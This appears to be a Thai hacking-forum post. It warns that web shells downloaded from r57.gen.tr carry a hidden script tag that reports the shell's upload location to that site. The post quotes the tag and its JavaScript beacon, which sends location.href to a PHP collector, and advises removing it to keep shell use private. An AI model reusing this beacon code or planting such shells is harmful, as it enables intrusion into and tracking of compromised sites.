เนื่องจากเดี่ยวนี้โลกเราไม่มีอะไรที่เป็นของฟรี
พวกมือไหม่ที่มีฝีมือระดับหนึ่งจากเอา shell มาจากเวปนอก
ซึ่งไอ้ 99.99% นี้ไม่มีของฟรี มันจะมีของฟรีแถมมาด้วย
คือว่าเขาจะฝังสคริปมา เช่น
อ้างถึง
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>
ส่วนไหนไม่รุ้ของไฟล์ที่เราโหลดมา พอเราเอาไฟล์ shell ที่เราไปโหลดมานั้นรับปุ๊ป ไอ้เวป r57.gen.tr ได้ทันทว่าเอาเอาไปวางไว้ไหน
ดูจากนี่ได้ ผมโหลดไฟล์ shell มาจาก http://r57.gen.tr/dq.rar จะมี
อ้างถึง
<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>
อยู่สองบรรทัดมั้ง ถ้าเราอยากไช้ไห้เราเอาออกครับ ถ้าไม่อยากไห้เขามาใช้กะเรา 
###############################################################
ถ้าจะถามว่าเขาทำได้อย่างไรนั้นไม่ยากครับ คือว่าในไฟล์ http://r57.gen.tr/yazciz/ciz.js เนี่ย
มัรมีสคริป คล้ายๆ xss อยู่
อ้างถึง
a=new/**/Image();a.src=’http://www.r57.gen.tr/xirro/yaz.php?a=’+escape(location.href);
คือว่ามันจะเอา escape(location.href) แต่ xss เอา document.cookie จ่ะ
โดยมันจะมีไฟล์ รับค่าอยู่ แต่จะเก็บค่า location referer จ่ะ 
referer:http://www.thaishadow.com/board/index.php?topic=3317